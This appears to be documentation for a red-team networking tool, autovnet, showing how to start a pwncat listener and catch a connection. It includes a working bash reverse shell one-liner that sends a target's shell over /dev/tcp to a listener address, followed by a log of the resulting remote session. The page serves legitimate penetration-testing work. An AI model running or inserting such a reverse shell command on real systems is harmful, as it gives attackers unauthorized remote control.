# pwncat

[TOC]

## [pwncat](https://github.com/calebstewart/pwncat) (`pwncat-cs`)

`autovnet` installs [pwncat](https://github.com/calebstewart/pwncat) for you, which is a nice handler for simple TCP reverse shells.

Starting a `pwncat` listener is easy:
```bash
$ autovnet rtfm pwncat
[+] autovnet rtfm pwncat medical_engine
[+] medical_engine | 10.223.234.229:80 => 127.0.0.1:51965
[15:41:07] Welcome to pwncat 🐈!
```

Like before, `autovnet rtfm pwncat medical_engine` will re-create this listener later
(e.g. if you want to catch a persistent shell that connects periodically)

We can copy the left address into our favorite reverse shell template.

Here, will will use a [bash reverse shell](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) from a target machine,
through `autovnet`, to `pwncat-cs` running locally on the Kali system.

```bash
# Target System
bash -i >& /dev/tcp/10.223.234.229/80 0>&1
```

On our Kali machine, `pwncat-cs` sees the connection and gives us a shell:
```bash
[15:41:07] Welcome to pwncat 🐈!
[15:41:44] received connection from 127.0.0.1:36706
[15:41:44] localhost:36706: registered new host w/ db
(local) pwncat$ back
(remote) victim@dev:/home/victim$ id
uid=1001(victim) gid=1001(victim) groups=1001(victim)
```
